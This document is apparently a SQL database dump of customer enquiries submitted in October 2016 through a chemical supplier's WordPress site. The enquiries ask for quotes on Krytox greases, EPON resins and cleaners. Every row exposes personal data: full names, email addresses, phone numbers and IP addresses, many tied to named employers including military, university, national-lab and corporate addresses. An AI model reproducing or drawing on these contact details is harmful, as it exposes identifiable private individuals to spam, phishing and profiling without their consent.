INSERT INTO `wp_enquiry_detail_new` VALUES (79, 'Bob Rees', 'reesra@westinghouse.com', 'Please send me (or call) price and availability for 1 gallon and 5 gallon of Vertrel XF.\n\nThanks!', '4123036080', 'Vertrel XF Price and Availablity', '208.114.63.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-20 14:19:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (80, 'Ruben Perez', 'ruben.perez.5@us.af.mil', 'Good Morning,\n\nI was wondering if I could inquire about a quote for a tube of Krytox 240AC, to include shipping. \nAlso the quote must be tax free for military purposes.\n\nThank you', '3256963016', 'Quote for Krytox 240AC', '131.59.200.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-20 14:51:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (81, 'Steven Oriani', 'steve.r.oriani@dupont.com', 'please let me know the price for this qty', '3026956859', '0.5 to 1 liter of GPL 106', '206.16.224.136', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"441";s:5:"title";s:7:"GPL 106";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease-pfpe.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-20 17:19:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (82, 'agrous', 'agrous@dixiechemical.com', '1 to 5 gallons ', '', 'Eponex price ', '207.91.143.34', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"986";s:5:"title";s:14:"EPONEX™ 1510";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-20 18:28:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (83, 'jon', 'jsandak@gmail.com', 'where can I buy this locally - Contact, MS-530N \nI am in NY and you have offices in Danbury.\n', '6463894409', 'Contact ReNu 530', '24.190.84.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-21 01:59:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (84, 'jon', 'jsandak@gmail.com', 'where can I buy this locally - Contact, MS-530N \nI am in NY and you have offices in Danbury.\n', '6463894409', 'Contact ReNu 530', '24.190.84.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-21 01:59:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (85, 'Chris Barnardo', 'chris.barnardo@saskcancer.ca', 'We are looking for a case of 25 MS-260 Safezone cleaner. Could we get a quote. Thanks. We have purchased from you before. But quite some time ago. It is for the Saskatoon Cancer Centre.\nChris', '3066552699', 'MS-260', '207.195.114.101', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-21 16:43:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (86, 'Donald Lemke', 'don.lemke@downstate.edu', 'Do we purchased direct through you and if so what is the price for NYS Educational institutions.', '7182707421', 'Aero Duster ', '138.5.89.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-21 17:11:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (87, 'Richard FRIEDL', 'richard.friedl@bluewin.ch', 'could you pls tell me about prices shipped to Switzerland.\nThanks\nRichard', '0041794045237', 'cleaner for plastic glass', '82.58.13.131', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-22 15:02:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (88, 'Tahir Mahmood', 'tahir.mehmood@piac.aero', 'Pakistan International Airlines would like to sed a RFQ for Part No MS-111. Qty 01 EA\n\nKindly provide Price and availibility for Qty 01', '7373330285', 'RFQ for MS-111', '39.48.86.189', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-23 08:33:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (89, 'Sabu', '14saba14@gmail.com', 'Hi.I want 20 liter Epon 828 resin epoxy hexion in Iran.can you shipping to Iran?\nThanks', '989360401180', 'Epon 828 resin epoxy hexion,shipping to Iran', '194.225.232.21', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-23 08:45:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (90, 'Vivian Zhong', 'vivian.zhong@tufts.edu', 'Hello,\n\nWhat is the price of the smallest size of MS-143XD? Is there an aerosol option for this product as well? If so, what is the price of the aerosol option also?\n\nThank you,\nVivian', '9143800357', 'Quote for smallest size of MS-143XD', '130.64.25.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:8:"MS-143XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-23 20:26:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (91, 'Robert Wetherhold', 'mhewlett@buffalo.edu', 'please quote the price for a quart of Epon Resin 815C', '7166451453', 'Order for Quart of Epoxy', '128.205.24.135', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-24 16:46:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (92, 'Marilyn', 'mc@plxinc.com', 'Can I please have a price on the MS-122AD?  \nThank you,\nMarilyn Coffin\nPLX Inc.', '', 'Release Agent Dry Lubricant Price', '167.206.204.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-24 17:31:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (93, 'Larry McKinney', 'lmckinney@prestongm.com', 'General Motors recommends we use Krytox GPL215 for a service fix. Can you supply us with a small tube of this? We are in Langley, B.C.\nThanks', '6045345351', 'Dupont Krytox GPL 215', '207.102.139.243', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"822";s:5:"title";s:7:"GPL 215";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_60848668.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-24 19:40:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (94, 'Georgios Paloumpis', 'paloumpis.georgios@gmail.com', 'I am trying to eliminate rattling noises on the windows and door guides of my car (Bmw Series 1).\n\nPlease advise if this product is suitable and what is its price? \nThe product has to be shipped in Greece.', '00306948624926', 'Request for Krytox AUT 2045', '62.38.51.195', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"713";s:5:"title";s:8:"AUT 2045";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_437367067.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 08:03:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (95, 'Guner Sonmez', 'guner.sonmez@exim.com.tr', 'Dear Sir/Madam,\n\nWe are a settled company in Turkey.\nWe would like to purchase MS 260 Miller Stephensen Cleaning Sprey and could you please quote us for 50 pcs?\n\nPlease send us quotation and lead time.\n\nBest Regards', '00902123484808', 'MS 260 Miller Stephensen Cleaning Sprey', '91.199.191.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 11:35:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (96, 'Caitlyn Neidig', 'neidig@ppg.com', 'I would like to request a sample of the EPIKURE W curing agent.', '', 'EPIKURE W', '141.189.251.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 14:19:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (97, 'Elaine Lanza', 'elanza@cytonix.com', 'Can you tell me the quantities you sell of this product?  I am looking to purchase 1-10 gallons.  What is the price?  What would you recommend as an ambient cure catalyst for this material?', '7039295324', 'price and volume ', '77.234.44.141', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"918";s:5:"title";s:17:"EPON™ 1001-X-75";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 14:40:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (98, 'Donna Norman', 'donna@goaero.net', 'Please quote price &amp; delivery for 4 each.', '3362951348', 'P/N GPL107 1 oz', '45.36.33.28', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"442";s:5:"title";s:7:"GPL 107";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-pfpe-oil-grease-gpl.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 15:09:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (99, 'Erin Wilson', 'wilsonee@westminster.edu', 'Would it be possible to get a small quantity (25 mL)?', '7249466290', 'small quantity', '70.32.50.211', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 15:18:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (100, 'Craig Ponsler', 'craig@toefco.com', 'Hello,\n\n        Looking to get a small tube of the Krytox Aut 2A45. We have lots of automated lines with bearings as well as electric motors. Did the research on it and seems it could be an advantage if used over or normal grease. Would like a small tube to have my maintenance guy try, if results are good then we would order a bucket.', '5742529512', 'Krytox', '75.146.128.149', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"715";s:5:"title";s:8:"AUT 2A45";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_194255531.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 17:29:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (101, 'Kevin Ng', 'ng32@llnl.gov', 'Hi,  Would you have a product information sheet for MS-143AX?  This should have the product use instructions on it.  Thank you.', '9254220371', 'MS-143AX', '134.9.207.64', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"305";s:5:"title";s:8:"MS-143AX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143AX-.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 17:39:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (102, 'rstaas', 'rstaas@techmetals.com', 'Need 2 -12oz bottles', '9372535311', '', '98.102.3.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 17:56:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (103, 'rstaas', 'rstaas@techmetals.com', 'need 2- 12oz bottles', '9372535311', '', '98.102.3.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 17:57:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (104, 'Minh Le', 'mle@alliancecorporation.ca', 'Looking for Teflon based mold release agent for potting silicon one part in AA6061 mold.\nPlease help', '6472444506', 'Teflon Based Mold Release Agent', '206.210.107.170', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 19:45:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (105, 'YEN CHAO', 'yen.chao@litepoint.com', 'The application is for low viscosity epoxy molding with Aluminum mold.  Please comment if this is the right product, and where to buy.\n\nThanks', '4084565000', 'MS-122AD', '12.40.240.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 20:20:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (106, 'Andrew Pierz', 'andy@andypierz.com', 'I\'m looking for some information on Fluoroguard pricing and the difference in pricing/performance between the three formulations.', '6303528493', 'Fluorogaurd Pro Pricing', '50.168.73.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1435";s:5:"title";s:18:"Fluoroguard™ PRO";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pro-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-25 22:44:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (107, 'John Gnatowski', 'jgnatowski@metrohealth.org', 'Hello,\n\nI work with The MetroHealth System in Cleveland, Ohio and would like to request pricing information on the 16oz Aerosol MS-260 plastic-glass-metal cleaner.  If one of your associates would be able to provide me with pricing information on this product, it would be greatly appreciated.\n\nThank you!\n\nJohn J. Gnatowski\nCoordinator of Clinical Engineering', '2167782230', 'MS-260 Pricing Inquiry', '169.240.84.223', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-26 15:35:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (108, 'Mike Pate', 'mpate@midsouthmillsupply.com', 'Please provide a quote for the following 2 items:\n\nResin, Epoxy, Eon-862  APSP-44476\nPlease quote available quantities\n\nEpikure curing agent W  APSP-44477\nPlease quote available quantities', '5018403055', 'Request for quote', '24.35.232.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-26 21:00:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (109, 'Mike Pate', 'mpate@midsouthmillsupply.com', 'Please provide a quote for the following 2 items:\n\nResin, Epoxy, Eon-862  APSP-44476\nPlease quote available quantities\n\nEpikure curing agent W  APSP-44477\nPlease quote available quantities', '5018403055', 'Request for quote', '24.35.232.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-26 21:00:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (110, 'Nam Phan', 'vannamqbphan@gmail.com', 'Hello Sir.\nOur company (in Vietnam) Dupont Krytox GPL Purchase 226 fat, weight 10kg.\nPlease let us know.\nWe wish to cooperate with Sir.', '', '', '42.118.198.202', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-27 05:03:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (111, 'RAFAEL', 'rafael.h@global-engine.com', 'Please quote the 1.1 pound can and the 2oz.', '3057170951', 'KRYTOX 283AD', '12.153.108.171', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"656";s:5:"title";s:5:"283AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:97:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-grease-aerospace-aviation.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-27 16:05:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (112, 'Tom Rioux', 'Trioux@butlerbros.com', 'Requesting quote of a MS222N air duster in case volume with discount brackets.\nThank you\nTom Rioux\nButler Bros\n', '2075133213', 'RFQ MS-222N', '40.141.65.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-27 18:52:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (113, 'Ray Heinbokel', 'repairs@midwestcamera.com', 'We need to order soon some more Contact Re-Nu, the last can we have is DPMS RO524-A and has on the side "Developmental Product".  What is the new product number?\n\nThank you\nMidwest Camera Repair, Inc.', '7342852220', 'Contact Re-Nu', '107.221.192.238', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-27 19:50:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (114, 'Craig Sundberg', 'csundberg@heatron.com', 'I need (1) can to try this. Is there a price per can OR is this small enough need to be a sample? I\'m happy to buy this to try it but I need it by next week please.', '9139461328', 'MS-122AD  Mold Release Sample Request', '66.211.224.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-28 11:28:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (115, 'shelley jackson', 'shelley.l.jackson@boeing.com', 'MS-122ADL Product Use: Release Agent or Dry Lubricant\nH1212A\nPTFE Release Agent/Dry Lubric', '', 'quote', '130.76.24.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1679";s:5:"title";s:9:"MS-122ADL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122adl-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-28 14:08:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (116, 'Tobias Donnell', 'tdonnell4425@mytu.tuskegee.edu', 'Hello,\n\nI am inquiring about the availability and pricing of bulk orders of EPON 862 and Epikure-W. I would need roughly  4-6 bottles of EPON 862 and 2-4 bottles/cans of Epikure-W, if that information helps with pricing.\n\nThank you for your time,\nTobias', '3347971706', 'Epon 862 and Epikure-W', '192.203.127.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-28 17:52:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (117, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdasd test ', '', 'test', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-28 17:56:35', '', NULL, '', '', '', NULL, '', ''); 
